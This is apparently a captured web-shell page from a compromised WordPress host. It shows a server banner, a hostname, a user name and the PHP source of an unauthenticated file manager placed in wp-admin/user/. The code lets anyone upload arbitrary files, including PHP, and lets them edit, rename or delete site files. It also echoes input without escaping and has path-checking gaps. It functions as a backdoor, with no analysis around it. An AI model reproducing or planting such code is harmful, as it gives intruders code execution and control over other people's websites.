HEX
Server: LiteSpeed
System: Linux server334.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: richfield (1256)
PHP: 8.2.31
Disabled: NONE
$ pwd: /home/richfield/text.pio.richfield-egy.com/wp-admin/user/
Upload Files
File: /home/richfield/text.pio.richfield-egy.com/wp-admin/user/file.php
<?php
$path = isset($_GET['path']) ? $_GET['path'] : '.';
$path = realpath($path);
$baseDir = realpath(__DIR__);
if (strpos($path, $baseDir) !== 0) {
    die("Access Denied");
}

// Handle file upload
if (isset($_FILES['upload'])) {
    $uploadPath = $path . '/' . basename($_FILES['upload']['name']);
    move_uploaded_file($_FILES['upload']['tmp_name'], $uploadPath);
    header("Location: ?path=$path");
    exit;
}

// Handle folder creation
if (isset($_POST['new_folder'])) {
    mkdir($path . '/' . $_POST['new_folder']);
    header("Location: ?path=$path");
    exit;
}

// Handle delete
if (isset($_GET['delete'])) {
    $target = realpath($path . '/' . $_GET['delete']);
    if (strpos($target, $baseDir) === 0) {
        if (is_dir($target)) {
            rmdir($target);
        } else {
            unlink($target);
        }
    }
    header("Location: ?path=$path");
    exit;
}

// Handle rename
if (isset($_POST['rename_old']) && isset($_POST['rename_new'])) {
    $old = $path . '/' . $_POST['rename_old'];
    $new = $path . '/' . $_POST['rename_new'];
    if (strpos(realpath($old), $baseDir) === 0) {
        rename($old, $new);
    }
    header("Location: ?path=$path");
    exit;
}

// Handle file editing
if (isset($_GET['edit'])) {
    $editFile = realpath($path . '/' . $_GET['edit']);
    if (strpos($editFile, $baseDir) !== 0 || !is_file($editFile)) {
        die("Invalid file");
    }

    if (isset($_POST['content'])) {
        file_put_contents($editFile, $_POST['content']);
        header("Location: ?path=$path");
        exit;
    }

    $content = htmlspecialchars(file_get_contents($editFile));
    echo "<h2>Editing File: " . basename($editFile) . "</h2>";
    echo "<form method='POST'>
        <textarea name='content' style='width:100%;height:400px;'>$content</textarea><br>
        <button type='submit'>💾 Save</button>
        <a href='?path=$path'>❌ Cancel</a>
    </form>";
    exit;
}

// List files and folders
$items = scandir($path);
echo "<h2>File Manager: $path</h2>";
echo "<a href='?path=" . dirname($path) . "'>⬅️ Back</a><br><br>";

echo "<form method='POST' enctype='multipart/form-data'>
    <input type='file' name='upload'>
    <button type='submit'>Upload</button>
</form>";

echo "<form method='POST'>
    <input type='text' name='new_folder' placeholder='New folder name'>
    <button type='submit'>Create Folder</button>
</form><br>";

echo "<table border='1' cellpadding='5'>";
echo "<tr><th>Name</th><th>Actions</th></tr>";
foreach ($items as $item) {
    if ($item == '.' || $item == '..') continue;
    $itemPath = $path . '/' . $item;
    echo "<tr><td>";
    if (is_dir($itemPath)) {
        echo "<a href='?path=$itemPath'>📁 $item</a>";
    } else {
        echo "📄 $item";
    }
    echo "</td><td>
        <form method='POST' style='display:inline'>
            <input type='hidden' name='rename_old' value='$item'>
            <input type='text' name='rename_new' placeholder='New name'>
            <button type='submit'>Rename</button>
        </form>
        <a href='?path=$path&delete=$item' onclick='return confirm(\"Delete $item?\")'>🗑️ Delete</a>";

    if (!is_dir($itemPath)) {
        $relativePath = str_replace($_SERVER['DOCUMENT_ROOT'], '', $itemPath);
        echo " | <a href='$relativePath' download>⬇️ Download</a>";

        $ext = pathinfo($itemPath, PATHINFO_EXTENSION);
        $editableExts = ['php', 'html', 'htm', 'txt', 'css', 'js'];
        if (in_array(strtolower($ext), $editableExts)) {
            echo " | <a href='?path=$path&edit=$item'>✏️ Edit</a>";
        }
    }
    echo "</td></tr>";
}
echo "</table>";
?>
@ Telegram